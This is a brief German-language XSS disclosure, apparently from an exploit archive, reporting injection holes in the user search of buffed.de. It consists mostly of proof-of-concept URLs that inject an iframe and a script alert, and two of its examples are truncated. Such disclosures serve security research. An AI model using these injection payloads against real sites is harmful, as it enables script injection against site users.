#http://buffed.de XSS Vulnerability. #Software/Web: http://buffed.de #Found By: elric #Exploit: Diverse XSS Lücken in der User Suche auf Buffed.de (http://my.buffed.de/) HTML Inject: z.B. "> Javascript Inject: z.B. "> Urlhacking: z.B. http://my.buffed.de/search/users?search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fgoogle.com%3EX%3C%2Fiframe%3E&=&pass123=&online_sort=&advanced=&show_limit=20&town=&plz=&country=&age_from=&age_to=&realm_id=1&faction= http://my.buffed.de/search/users?search=%22%3E%3Cscript%3Ealert(1);%3C/script%3E usw .. *** Elbone Network - Security http://elbone.net